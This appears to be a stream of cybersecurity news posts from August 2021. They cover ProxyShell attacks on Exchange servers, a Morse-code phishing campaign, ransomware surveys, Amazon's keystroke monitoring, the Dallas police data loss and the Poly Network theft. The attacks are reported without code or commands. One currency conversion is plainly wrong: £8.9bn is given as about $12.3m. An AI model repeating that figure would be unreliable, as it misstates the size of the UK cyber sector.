Posts by Cyber News

    A large cache of criminal case data belonging to the Dallas Police Department (DPD) is thought to have been lost forever.

    About 22 terabytes of data went missing from the DPD computer database when data was migrated from an online, cloud-based archive to a server at the city’s data center in April.

    The data that disappeared included images, video, audio, case notes and other information gathered by police officers and detectives in relation to cases from before July 28, 2020.

    Dallas PD attribute the data’s permanent departure to the actions of a single city IT employee who it says “failed to follow proper, established procedures” while performing the data migration.

    Authorities softened the announcement of the loss earlier this week with news that approximately 14 terabytes of data have since been recovered. The DPD believes the remaining eight terabytes of information are gone forever.

    The quantity of information lost is considerable, since one terabyte can store as many as six million documents and 250,000 images.

    District attorney John Creuzot said in a memo that it was “too soon to estimate how many cases will be affected and what the impact will be on those individual cases,” but he was hopeful that duplicates of some of the data may have been stored elsewhere.

    “It is possible that much of the missing evidence had already been uploaded to this office’s data portal prior to April 5,” said Creuzot.

    The absence of the case data was first noticed by city information technology officials on April 5. However, the Charlotte Observer reports that the district attorney’s office was not notified of the loss until August 6.

    This notification reportedly followed complaints from prosecutors who suddenly found themselves unable to locate computer files on pending cases.

    “It is concerning that it took four months for the Dallas Police Department to inform the district attorney of the loss of the data,” said Dallas defense attorney Amanda Branan, the president of the Dallas Criminal Defense Lawyers Association.

    Dallas Mayor Eric Johnson is calling for the Dallas City Council to launch an investigation into the data loss.

    Data theft, insider threats and imposters accessing sensitive customer data have apparently gotten so bad inside Amazon, the company is considering rolling out keyboard-stroke monitoring for its customer-service reps.

    A confidential memo from inside Amazon explained that customer service credential abuse and data theft was on the rise, according to Motherboard which reviewed the document. Keystroke monitoring would be a way for the company to verify the identity of who was accessing data.

    “We have a security gap as we don’t have a reliable mechanism for verifying that users are who they claim they are,” the document reportedly said.

    Amazon’s memo added that outsourced employees working from home in countries like India and the Philippines, where most of these security incidents occur, has created a “high data-exfiltration risk,” according to Motherboard.

    Roommates of legitimate customer service reps curious to look up what famous people purchased from Amazon; hackers purchasing customer-service credentials; even the use of a USB Rubber Ducky to rapidly input keystrokes to gain access to systems, are all ways that attackers have abused Amazon data, according to the report.

    The company added that it’s considering using a company called BehavioSec, which uses the aggregate data of a user’s mouse clicks and keystrokes to develop a profile of their typical behavior. Once that baseline of typical behavior is established, the BehavioSec tool will identify when someone’s activity is unusual. But based on Motherboard’s reporting, Amazon doesn’t seem to have settled on a final plan.

    “We are considering an option that will include capturing all keystrokes and with this functionality turned on, we may not be able to deploy the off-the-shelf solution,” the company said.

    But even this disclosure is probably downplaying how rampant the problem is, Gaurav Banga, CEO of Balbix told Threatpost.

    “Amazon is a purpose-driven company,” Banga said. “They don’t do anything for no reason.”

    What If You Don’t Know Your Employees?

    The most basic security control in any organization is the employee manager, he explained. The manager knows who the employees are, what they’re supposed to be doing and how they’re supposed to be doing it. Once employees started working from home offices, that most basic security control was lost.

    “You can’t see who’s an insider and who’s an outsider,” Banga said. “So how do you compensate for not knowing who your employees are?”

    He said keystroke monitoring is the kind of security that remote employees will have to get used to in the future.

    “Cybercriminals are becoming increasingly sophisticated in penetrating the enterprise and, once in, remain undetected for long periods of time,” Ordr CEO Greg Murphy told Threatpost. “Behavioral profiling is becoming increasingly important to be able to detect these threat actors, not just via user behaviors but anomalous patterns of behavior in connected devices.”

    Murphy explained that if a video-surveillance camera suddenly starts communicating with a malicious ransomware domain, that’s an obvious departure from regular behavior that should be investigated.

    “Amazon seems to be taking it a step further by monitoring keystrokes on customer-service agent devices,” he said. “This will be useful to detect devices that have already been compromised, particularly with many customer service agents now working from home with shared living quarters and poor physical security.”

    Murphy cautioned organizations to only use these types of monitoring controls on company-owned equipment. He added that organizations like Barclays have already riled up their employees with similar software monitoring initiatives.

    For employees worried about privacy, Banga offered a simple fix: Don’t do anything personal on a work computer.

    The flip side of that, Banga added, is that companies need to start taking control of the tech that runs their business and put firm policies in place to ensure security. Besides a basic acknowledgement that employees are subject to monitoring, Banga said he doesn’t think most people would care about their work-habit data being collected.

    Besides, Banga added, there are jobs in industries like finance and government where data protection has always been part of an employee’s role in the organization.

    “If you work for a big fish and you handle big-fish data you have to protect that data,” he added.

    Worried about where the next attack is coming from? We’ve got your back. REGISTER NOW for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs. Find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this LIVE discussion.

    The White House has ordered federal agencies to identify all the critical software in their systems and secure it.

    The order was issued to the heads of executive departments and agencies on August 10 in a memo from the Office of Management and Budget’s acting director, Shalanda Young. Recipients were given 60 calendar days from the date of the memo’s publication to pinpoint the critical software.

    According to the memo, much of the software that the federal government relies on to perform its critical functions is “commercially developed through an often-opaque process that may lack sufficient controls to prevent the creation and exploitation of significant application security vulnerabilities.”

    Young writes that this situation has resulted in “a pressing need to implement more rigorous and predictable mechanisms for ensuring that products function securely in the manner intended.”

    In the memo, Young references guidance released by the National Institute of Standards and Technology (NIST) on what constitutes critical software.

    An executive order on Improving the Nation’s Cybersecurity, issued by President Joe Biden on May 12, 2021, directed NIST to publish a definition of the term critical software.

    The resulting definition of critical software published by NIST in June described it as “any software that has, or has direct software dependencies upon, one or more components with at least one of these attributes:

    • is designed to run with elevated privilege or manage privileges;

    • has direct or privileged access to networking or computing resources;

    • is designed to control access to data or operational technology;

    • performs a function critical to trust; or,

    • operates outside of normal trust boundaries with privileged access.”

    After identifying their critical software, agencies have one year to implement critical software guidance security measures decided upon by NIST.

    “The United States faces increasingly sophisticated malicious cyber campaigns that threaten the public sector, the private sector, and, ultimately, the American people’s security and privacy,” the memo states.

    “The federal government must improve its efforts to detect, identify, deter, protect against, and respond to these campaigns and their perpetrators.”

    American tech-driven beauty brand IL MAKIAGE has acquired Israeli deep-tech AI-based computational imaging startup Voyage81 for $40m.

    IL MAKIAGE, which is based in New York City’s Soho area, was relaunched in 2018 by brother and sister duo Oran Holtzman and Shiran Holtzman-Erel. Two years later, the company became the fastest-growing online beauty brand in the United States.

    Voyage81 developed the only patented software in the world that gives smartphones hyperspectral imaging capabilities. Where a normal smartphone photo detects three wavelengths of color, Voyage81’s software can detect 31.

    The acquisition of Voyage81 was the result of a long-running search for specific technology, according to IL MAKIAGE CEO Oran Holtzman.

    “For the past two years, we have been searching for computational imaging solutions that can work in beauty and wellness to further advance our existing AI capabilities,” said Holtzman.

    “I have met dozens of computer vision startups but could not find a technology that can fit our industry and was strong enough to fulfill our goals. Bringing on Voyage81’s patented technology and exceptional team to our tech and data science departments is a HUGE win for our company’s future, our users, and the industry at-large.”

    The software developed by Voyage81 can analyze skin and hair features from a photograph taken with a smartphone and use that data to create maps of blood flow and melanin. This information can in turn be used to create personalized skincare.

    Voyage81’s founder and CEO Niv Price is the former head of R&D at Unit 81, described by the Jerusalem Post as “the most elite technological unit in the Israeli Defense Forces.”

    Price said that when he met with IL MAKIAGE, he had no intention of selling the company he founded in 2019.

    “But after meeting Oran and learning about the company’s long-term vision, we realized that under the IL MAKIAGE platform, Voyage81 technology will serve and benefit hundreds of millions of consumers, fulfilling our founding goal,” said Price.

    Voyage81 isn’t the only tech company to be snapped up by IL MAKIAGE. In 2019, the beauty brand acquired NeoWize, a Y Combinator-backed data science startup that develops advanced active machine learning algorithms.

    There’s an entirely new attack surface in Exchange, a researcher revealed at Black Hat, and threat actors are now exploiting servers vulnerable to the RCE bugs.

    Researchers’ Microsoft Exchange server honeypots are being actively exploited via ProxyShell: The name of an attack disclosed at Black Hat last week that chains three vulnerabilities to enable unauthenticated attackers to perform remote code execution (RCE) and snag plaintext passwords.

    In his Black Hat presentation last week, Devcore principal security researcher Orange Tsai said that a survey shows more than 400,000 Exchange servers on the internet that are exposed to the attack via port 443. On Monday, the SANS Internet Storm Center’s Jan Kopriva reported that he found more than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find it a snap to pull off, given how much information is available.

    Going by calculations tweeted by security researcher Kevin Beaumont, this means that, between ProxyLogon and ProxyShell, “just under 50 percent of internet-facing Exchange servers” are currently vulnerable to exploitation, according to a Shodan search.

    Breakdown of Exchange servers on Shodan vulnerable to ProxyShell or ProxyLogon, it’s just under 50% of internet facing Exchange servers. pic.twitter.com/3samyNHBpB

    — Kevin Beaumont (@GossiTheDog) August 13, 2021

    On the plus side, Microsoft has already released patches for all of the vulnerabilities in question, and, cross your fingers, “chances are that most organizations that take security at least somewhat seriously have already applied the patches,” Kopriva wrote.

    The vulnerabilities affect Exchange Server 2013, 2016 and 2019.

    On Thursday, Beaumont and NCC Group’s vulnerability researcher Rich Warren disclosed that threat actors have exploited their Microsoft Exchange honeypots using the ProxyShell vulnerability.

    “Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,” Warren tweeted, along with a screen capture of the code for a c# aspx webshell dropped in the /aspnet_client/ directory.

    Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities. This one dropped a c# aspx webshell in the /aspnet_client/ directory: pic.twitter.com/XbZfmQQNhY

    — Rich Warren (@buffaloverflow) August 12, 2021

    Beaumont tweeted that he was seeing the same and connected it to Tsai’s talk: “Exchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from @orange_8361’s initial talk.”

    Exchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from @orange_8361’s initial talk.

    — Kevin Beaumont (@GossiTheDog) August 12, 2021

    Dangerous Skating on the New Attack Surface

    In a post on Sunday, Tsai recounted the in-the-wild ProxyLogon proof of concept that Devco reported to MSRC in late February, explaining that it made the researchers “as curious as everyone after eliminating the possibility of leakage from our side through a thorough investigation.

    “With a clearer timeline appearing and more discussion occurring, it seems like this is not the first time that something like this happened to Microsoft,” he continued. Mail server is both a highly valuable asset and a seemingly irresistible target for attackers, given that it holds businesses’ confidential secrets and corporate data.

    “In other words, controlling a mail server means controlling the lifeline of a company,” Tsai explained. “As the most common-use email solution, Exchange Server has been the top target for hackers for a long time. Based on our research, there are more than four hundred thousands Exchange Servers exposed on the Internet. Each server represents a company, and you can imagine how horrible it is while a severe vulnerability appeared in Exchange Server.”

    During his Black Hat presentation, Tsai explained that the new attack surface his team discovered is based on “a significant change in Exchange Server 2013, where the fundamental protocol handler, Client Access Service (CAS), splits into frontend and backend” – a change that incurred “quite an amount of design” and yielded eight vulnerabilities, consisting of server-side bugs, client-side bugs and crypto bugs.

    He chained the bugs into three attack vectors: The now-infamous ProxyLogon that induced patching frenzy a few months back, the ProxyShell vector that’s now under active attack, and another vector called ProxyOracle.

    “These attack vectors enable any unauthenticated attacker to uncover plaintext passwords and even execute arbitrary code on Microsoft Exchange Servers through port 443, which is exposed to the Internet by about 400,000 Exchange Servers,” according to the presentation’s introduction.

    The three Exchange vulnerabilities, all of which are patched, that Tsai chained for the ProxyShell attack:

    • CVE-2021-34473 – Pre-auth path confusion leads to ACL bypass
    • CVE-2021-34523 – Elevation of privilege on Exchange PowerShell backend
    • CVE-2021-31207 – Post-auth arbitrary file-write leads to RCE

    ProxyShell earned the Devcore team a $200,000 bounty after they used the bugs to take over an Exchange server at the Pwn2Own 2021 contest in April.

    During his Black Hat talk, Tsai said that he discovered the Exchange vulnerabilities when targeting the Microsoft Exchange CAS attack surface. As Tsai explained, CAS is “a fundamental component” of Exchange.

    He referred to Microsoft’s documentation, which states:

    “Mailbox servers contain the Client Access services that accept client connections for all protocols. These frontend services are responsible for routing or proxying connections to the corresponding backend services on a Mailbox server.”

    “From the narrative you could realize the importance of CAS, and you could imagine how critical it is when bugs are found in such infrastructure. CAS was where we focused on, and where the attack surface appeared,” Tsai wrote. “CAS is the fundamental component in charge of accepting all the connections from the client side, no matter if it’s HTTP, POP3, IMAP or SMTP, and proxies the connections to the corresponding backend service.”

    ProxyShell Just the ‘Tip of the Iceberg’

    Out of all the bugs he found in the new attack surface, Tsai dubbed CVE-2020-0688 (an RCE vulnerability that involved a hard-coded cryptographic key in Exchange) the “most surprising.”

    “With this hard-coded key, an attacker with low privilege can take over the whole Exchange Server,” he wrote. “And as you can see, even in 2020, a silly, hard-coded cryptographic key could still be found in an essential software like Exchange. This indicated that Exchange is lacking security reviews, which also inspired me to dig more into the Exchange security.”

    But the “most interesting” flaw is CVE-2018-8581, he said, which was disclosed by someone who cooperated with ZDI. Though it’s a “simple” server-side request forgery (SSRF), it could be combined with NTLM Relay, enabling the attacker to “turn a boring SSRF into something really fancy,” Tsai said.

    For example, it could “directly control the whole Domain Controller through a low-privilege account,” Tsai said.

    Autodiscover Figures into ProxyShell

    As BleepingComputer reported, during his presentation, Tsai explained that one of the components of the ProxyShell attack chain targets the Microsoft Exchange Autodiscover service: a service that eases configuration and deployment by providing clients access to Exchange features with minimal user input.

    Tsai’s talk evidently triggered a wave of scanning for the vulnerabilities by attackers.

    After watching the presentation, other security researchers replicated the ProxyShell exploit. The day after Tsai’s presentation, last Friday, PeterJson and Nguyen Jang published more detailed technical information about their successful reproduction of the exploit.

    Soon after, Beaumont tweeted about a threat actor who was probing his Exchange honeypot using the Autodiscover service. As of yesterday, Aug. 12, those servers were being targeted using autodiscover.json, he tweeted.

    Exchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from @orange_8361’s initial talk.

    — Kevin Beaumont (@GossiTheDog) August 12, 2021

    As of Thursday, ProxyShell was dropping a 265K webshell – the minimum file size that can be created via ProxyShell due to its use of the Mailbox Export function of Exchange Powershell to create PST files – to the ‘c:inetpubwwwrootaspnet_client’ folder. Warren shared a sample with BleepingComputer that showed that the webshells consist of “a simple authentication-protected script that the threat actors can use to upload files to the compromised Microsoft Exchange server.”

    Bad Packets told the outlet that as of Thursday, was seeing threat actors scanning for vulnerable ProxyShell devices from IP addresses in the U.S., Iran and the Netherlands, using the domains @abc.com and @1337.com, from the known addresses 3.15.221.32 and 194.147.142.0/24.

    Worried about where the next attack is coming from? We’ve got your back. REGISTER NOW for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this LIVE discussion.

    Microsoft has disclosed details of an evasive year-long social engineering campaign wherein the operators kept changing their obfuscation and encryption mechanisms every 37 days on average, including relying on Morse code, in an attempt to cover their tracks and surreptitiously harvest user credentials.

    The phishing attacks take the form of invoice-themed lures mimicking financial-related business transactions, with the emails containing an HTML file (“XLS.HTML”). The ultimate objective is to harvest usernames and passwords, which are subsequently used as an initial entry point for later infiltration attempts.

    Microsoft likened the attachment to a “jigsaw puzzle,” noting that individual parts of the HTML file are designed to appear innocuous and slip past endpoint security software, only to reveal its true colors when these segments are decoded and assembled together. The company did not identify the hackers behind the operation.

    “This phishing campaign exemplifies the modern email threat: sophisticated, evasive, and relentlessly evolving,” Microsoft 365 Defender Threat Intelligence Team said in an analysis. “The HTML attachment is divided into several segments, including the JavaScript files used to steal passwords, which are then encoded using various mechanisms. These attackers moved from using plaintext HTML code to employing multiple encoding techniques, including old and unusual encryption methods like Morse code, to hide these attack segments

    Opening the attachment launches a browser window that displays a fake Microsoft Office 365 credentials dialog box on top of a blurred Excel document. The dialog box shows a message urging the recipients to sign in again due to reasons that their access to the Excel document has purportedly timed out. In the event the user enters the password, the individual is alerted that the typed password is incorrect, while the malware stealthily harvests the information in the background.

    The campaign is said to have undergone 10 iterations since its discovery in July 2020, with the adversary periodically switching up its encoding methods to mask the malicious nature of the HTML attachment and the different attack segments contained within the file.

    Microsoft said it detected the use of Morse code in the attacks’ February and May 2021 waves, while later variants of the phishing kit were found to direct the victims to a legitimate Office 365 page instead of showing a fake error message once the passwords were entered.

    “Email-based attacks continue to make novel attempts to bypass email security solutions,” the researchers said. “In the case of this phishing campaign, these attempts include using multilayer obfuscation and encryption mechanisms for known existing file types, such as JavaScript. Multilayer obfuscation in HTML can likewise evade browser security solutions.

    Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post.

    Bad bot activity rose on sporting and betting sites during sporting events such as Tour De France, EURO 2020 and the Tokyo Olympics.

    Imperva Research Labs has revealed that punters were left at risk of account takeover (ATO) attacks, leaving their digital wallets vulnerable to exploitation. Alarmingly, during the Tokyo Olympics, the company saw a spike in search engine impersonators during the first week and by week two, it grew by 103% above average.

    “Bad bots typically masquerade as legitimate users to remain undetected,” explained Imperva researchers in a blog post. “Incoming traffic to sporting sites saw an unusual 48% increase in Yahoo impersonators, 66% increase in Baidu impersonators and 88% increase in Google impersonators.

    “Imperva Research Labs also found ATO attacks grew 43% the week prior to the start of the Olympic Games, and spiked 74% during the first week of competition.”

    In the run up to the EURO 2020 football tournament, the organization monitored a 96% year-on-year increase in bot traffic on global sporting sites. ATO attacks also spiked by two or three times the daily average on the days when England played.

    Imperva also monitored a pattern of attacks getting larger as the tournament progressed with a notable peak occurring at the start of the Round of 16 teams.

    A similar trend was spotted at the beginning of the Tour De France—bot activity on sporting and gambling sites spiked 52% as the race was scheduled to begin.

    “Bot comment spammers were pervasive, with traffic increasing 62%,” the blog post stated. “The spammers took advantage of the interest in the event to post comments in Russian about an array of topics including: adult sites, crypto, coupons/discounts, casino sites and loans and investment opportunities.”

    ATO attacks are a type of fraud where cyber-criminals use a botnet to gain illegal access to accounts that belong to other users. According to Imperva, this is usually achieved through brute force login techniques such as credential stuffing, credential cracking or a dictionary attack.

    “Gambling sites are a lucrative target for account takeover attacks because user profiles often have financial information or even funds stored,” explained the blog post. “A successful account takeover can result in financial fraud, theft of personal data or sensitive business information.”

    According to the Imperva Bad Bot Report 2021, websites face an ATO attack 16% of the time. The report also found that one third of all login attempts in 2020 were malicious. With the English Premier League and other elite football leagues in Europe set to begin playing matches and the Beijing 2022 Winter Olympics and football World Cup in Qatar on the horizon, the organization is concerned that the threat of bad bots targeting fans during these global sporting events is likely to grow.

    “The bad bot problem is increasingly complex as automated web activity accounted for more than a quarter of all web traffic in 2020,” Imperva added in its blog post. “This trend is likely to grow as fans spend more time online searching for scores, placing bets and engaging in sport community forums. To mitigate automated threats across web, mobile and APIs, companies must take proactive steps to keep their users’ data secure.”

    The organization advises that sporting and betting sites should block or CAPTCHA outdated user agents and browsers, block known hosting providers and proxy services, monitor for failed login attempts and evaluate a bot protection solution such as web application and API protection (WAAP).

    The U.S. is presently combating two pandemics–coronavirus and ransomware attacks. Both have partially shut down parts of the economy. However, in the case of cybersecurity, lax security measures allow hackers to have an easy way to rake in millions.

    It’s pretty simple for hackers to gain financially, using malicious software to access and encrypt data and hold it hostage until the victim pays the ransom.

    Cyber attacks are more frequent now because it is effortless for hackers to execute them. Further, the payment methods are now friendlier to them. In addition, businesses are willing to pay a ransom because of the growing reliance on digital infrastructure, giving hackers more incentives to attempt more breaches.

    Bolder cybercriminals

    A few years back, cybercriminals played psychological games before getting bank passwords and using their technical know-how to steal money from people’s accounts. They are bolder now because it is easy for them to buy ransomware software-as-a-service and learn hacking techniques from online video-sharing sites, like YouTube. Some cyber gangs are even offering their services for a business hacking set up for a fee, typically a share of the profits.

    Cryptocurrency made the hackers bolder, as they can extort unlimited and anonymous cash payments. With the anonymity of bitcoin transfers, hackers found out they can demand higher amounts from their victims.

    You can also blame the rise in cyberattacks on the behavior of some firms that are willing to pay millions of dollars in bitcoin. However, attacks will stop if firms and data security experts ensure that hacking will not be profitable anymore.

    Are cyber attacks getting a higher profile or actually rising?

    The answer to both questions is yes. Ransomware is becoming more common because it is straightforward to execute. Hackers use software to poke around security holes or by tricking network users using phishing scam tactics like sending malware that seem to come from a trusted source. In addition, some large companies have been lax with their network security protocols, which cybersecurity experts learned recently.

    One such case is the supply chain attack at Colonial Pipeline, whose CEO Joseph Blount admitted before Congress that the company does not use multifactor authentication when users log in.

    Based on the Internet Crime Report released in 2020, the FBI received close to 2,500 ransomware reports in 2020, 20 percent higher than the reported cases in 2019. The FBI also noted that the collective cost of the ransomware attacks in 2020 was close to $29.1 million. It is equivalent to a 200 percent increase over 2019, wherein the cost reached $8.9 million.

    Another contributing factor to the rise in ransomware attacks is the growing number of online users. The coronavirus pandemic caused a spike in worldwide internet usage. Many students and workers are working and learning remotely.

    Cybercrime Magazine predicts that ransomware will cost victims about $265 billion each year starting 2031. Attacks are likely to occur every two seconds as hackers refine their malware attacks and extortion practices.

    Impact of ransomware on business

    We already know how ransomware can have devastating effects on businesses, large or small. But it pays to be reminded time and again because even enterprises can become victims. Cybercriminals continue to exploit vulnerabilities in network security systems. In addition, many hacking gangs are using ransomware and denial-of-service attacks for financial gains.

    Aside from the increasing occurrence of ransomware attacks, the cost of the attacks is growing as well. Ransomware paralyzes a company’s digital network and associated devices. Because sensitive business data is breached, business operations, particularly for supply chains, are affected–thus, companies prefer to pay a ransom.

    But theoretically, even if the company pays ransom, there is no guarantee that the sensitive data has not been copied. Likewise, there is no guarantee that attackers will return all the data or that the decryption key will work. In the case of Colonial, the decryption key hackers gave them after paying the ransom was too slow. So Colonial resorted to using their backup files. Kaseya, on the other hand, preferred to work with a third party for a decryption key.

    Preventing ransomware infection

    The FBI advises companies never to pay ransom to cybercriminals because it encourages them to launch more attacks. Some ways to prevent such attacks include:

    • Working with a cybersecurity firm that provides the best security system that fits a business’ current and future needs is one of your primary options.
    • Staying vigilant is another way to thwart infection. If your systems are slowing down for no apparent reason, disconnect from the internet and shut it down. Then, you can call your network security provider and seek their help. The Biden administration encourages businesses to beef up their cybersecurity programs and review their corporate security plans. Further, you should cooperate with the FBI and the Ransomware and Digital Extortion Task Force of the U.S. Department of Justice.

    Aside from the technical aspect of assuring cybersecurity, sometimes it pays to go back to basics.

    • Use security training so your employees will have a better understanding of the importance and meaning of cybersecurity. In addition, employees should learn to ensure the protection of the entire company from cyber attacks.
    • Train yourself and your staff not to click on links from unverified sources, as phishing emails are one of the methods to spread malware and make your company an easy target. Always scan emails, and notify employees of out-of-network emails.
    • Practice creating regular backups of your data. Have at least two data backups and store them at separate locations. Grant access to your backup only to your most trusted staff.
    • Use data encryption to protect emails, file exchanges, and personal information.
    • Ensure that you upgrade all your applications regularly so you can fix vulnerabilities.
    • Use password managers to ensure that all employees will have stronger passwords. Instruct employees to use different passwords to log in to the other applications you use in your company.

    Conclusion

    Ransomware attacks are rampant, due to their ease and profitability. Knowing about the activities of cybercriminal gangs and providing employee training on cybersecurity is vital. Combining technological expertise and basic security practices will help mitigate ransomware infection. However, it’s important not to panic and know the security measures you should follow.

    Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post.

    The UK Government has launched a new program to “spark a wave of growth” in the UK’s cyber sector.

    The Department for Digital, Culture, Media and Sport (DCMS) announced the initiative, known as “Cyber Runway,” today. It will be delivered by Plexal, CyLon, Deloitte and The Centre for Secure Information Technologies (CSIT).

    Cyber Runway will help entrepreneurs and businesses from across the UK—England, Wales, Scotland and Northern Ireland—have access to business masterclasses, mentoring, product development support, networking events and backing to trade internationally and secure investment. DCMS said it is aiming to support at least 160 organizations across the course of six months.

    In the last financial year, the cybersecurity sector’s revenue grew by 7%. The number of companies in the sector grew by 21%, with the sector now worth £8.9bn (approximately $12.3m).

    According to the DCMS, companies that have participated in the government’s cyber growth initiatives in the past have, on average, more than tripled their revenues year-on-year.

    “The UK’s cyber sector is booming and we’re working tirelessly to ensure the benefits are felt by businesses and individuals right across the country,” commented Matt Warman, Minister for Digital Infrastructure. “Our new Cyber Runway program will help tackle barriers to growth, increase investment and give firms vital support to take their businesses to the next level.”

    The program is looking to focus on Scotland, Northern Ireland, Wales, the North East, North West and the South West of England to support the UK government’s ‘levelling up’ agenda. It will also support founders and innovators from a “diverse range of backgrounds,” in a bid to grow underrepresented groups in the UK’s cyber sector such as women and people from Black, Asian and minority ethnic backgrounds.

    Saj Huq, director of innovation, Plexal, said: “COVID-19 has catalyzed the need for effective cybersecurity across industries, and a record level of capital is being invested into the sector. But there is still a need for support for businesses at the earliest stages of their development and innovators and entrepreneurs from underrepresented communities still face barriers when entering the ecosystem.

    “These are challenges we look forward to addressing with Cyber Runway by supporting the best innovators, regardless of their background or geography, to thrive and grow.”

    Cyber Runway follows a number of other DCMS-funded cyber programs which have now completed. These include HutZero, Cyber 101 and Tech Nation’s cyber accelerator for scaleups.

    Earlier this week, the National Cyber Security Centre (NCSC) unveiled the first five cyber firms to take part in another government-backed cyber startup program, which is designed to support innovative cybersecurity firms to develop products that will help protect critical areas of the UK’s economy and society from online harms.

    Over one-third of organizations worldwide have experienced a ransomware attack or breach that blocked access to systems or data in the previous 12 months, according to new research.

    In a survey conducted by the International Data Corporation (IDC), it was found that many organizations that fell victim to ransomware experienced multiple ransomware events. In the US, the incident rate was notably lower (7%) compared to the worldwide rate of 37%.

    “Ransomware has become the enemy of the day; the threat that was first feared on Pennsylvania Avenue and subsequently detested on Wall Street is now the topic of conversation on Main Street,” commented Frank Dickson, program vice president, cybersecurity products, IDC. “As the greed of cyber miscreants has been fed, ransomware has evolved in sophistication, moving laterally, elevating privileges, actively evading detection, exfiltrating data and leveraging multifaceted extortion. Welcome to digital transformation’s dark side.”

    The research, entitled IDC’s 2021 Ransomware Study: Where You Are Matters!, showed that the manufacturing and finance industries reported the highest ransomware incident rates. The transportation, communication and utilities and media industries reported the lowest.

    When it came to paying the piper, only 13% of organizations said that they had experienced a ransomware attack and not paid the ransom. For those that did, the average ransom payment was almost $250,000, with a few large ransom payments of over $1m.

    In the report shared the responses of nearly 800 IT decision makers and influencers. The July 2021 survey focused on topics such as attention by the board of directors, ransomware payments, size of ransomware, number of ransomware payments and the exfiltration of data.

    Based on the responses, IDC found that companies who were further along in the digital transformation journey were less likely to have experienced a ransomware attack.

    Joseph Carson, chief security scientist and advisory chief information security officer at ThycoticCentrify, believes that traditional cybersecurity solutions have failed to prevent ransomware from infecting organizations and creating mass disruption: “Conventional, signature-based antivirus programs are unable to prevent and detect these types of attacks due to the unique and quickly growing variants of ransomware.

    “Encrypting your data doesn’t necessarily deter ransomware attacks either,” he continued. “Attackers may still threaten to publicly disclose that data, expecting that others are willing to pay for the opportunity to break the encryption.”

    The research comes after Accenture, the global consulting firm, was the victim of a ransomware attack known as Lockbit 2.0. The Australian Cyber Security Centre (ACSC) also alerted organizations in the country that cyber-criminals were frequently using Lockbit 2.0 ransomware.

    “The ACSC has received reporting from several Australian organizations that have been impacted by LockBit 2.0 ransomware,” said the alert. “This activity has occurred across multiple industry sectors.”

    Oliver Tavakoli, CTO at Vectra, a San Jose, Calif.-based AI cybersecurity company, explained that while company culture of educating employees is helpful in preventing ransomware, it will “only get you so far.”

    Threat actors are actively carrying out opportunistic scanning and exploitation of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year.

    The remote code execution flaws have been collectively dubbed “ProxyShell.” At least 30,000 machines are affected by the vulnerabilities, according to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.

    “Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,” NCC Group’s Richard Warren tweeted, noting that one of the intrusions resulted in the deployment of a “C# aspx webshell in the /aspnet_client/ directory.”

    Patched in early March 2021, ProxyLogon is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server that permits an attacker to take control of a vulnerable server as an administrator, and which can be chained with another post-authentication arbitrary-file-write vulnerability, CVE-2021-27065, to achieve code execution.

    The vulnerabilities came to light after Microsoft spilled the beans on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.

    Since then, the Windows maker has fixed six more flaws in its mail server component, two of which are called ProxyOracle, which enables an adversary to recover the user’s password in plaintext format.

    Three other issues — known as ProxyShell — could be abused to bypass ACL controls, elevate privileges on Exchange PowerShell backend, effectively authenticating the attacker and allowing for remote code execution. Microsoft noted that both CVE-2021-34473 and CVE-2021-34523 were inadvertently omitted from publication until July.

    ProxyLogon:

    • CVE-2021-26855 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
    • CVE-2021-26857 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
    • CVE-2021-26858 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)
    • CVE-2021-27065 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)

    ProxyOracle:

    • CVE-2021-31195 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on May 11)
    • CVE-2021-31196 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on July 13)

    ProxyShell:

    • CVE-2021-31207 – Microsoft Exchange Server Security Feature Bypass Vulnerability (Patched on May 11)
    • CVE-2021-34473 – Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on April 13, advisory released on July 13)
    • CVE-2021-34523 – Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on April 13, advisory released on July 13)

    Other:

    • CVE-2021-33768 – Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on July 13)

    Originally demonstrated at the Pwn2Own hacking competition this April, technical details of the ProxyShell attack chain were disclosed by DEVCORE researcher Orange Tsai at the Black Hat USA 2021 and DEF CON security conferences last week. To prevent exploitation attempts, organizations are highly recommended to install updates released by Microsoft.

    Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post.

    The hacker behind the largest-ever cryptocurrency theft ever recorded has paid back nearly half ($260m) of the money to the victim organization, Poly Network.

    Earlier this week, it was reported that hackers exploited a vulnerability in Poly Network, a company that implements interoperability between different blockchains, that enabled them to change the address of the “keeper role” of a blockchain contract and “construct any transaction at will and withdraw any amount of funds from the contract.”

    This enabled the hacker to transfer $610m to three different addresses.

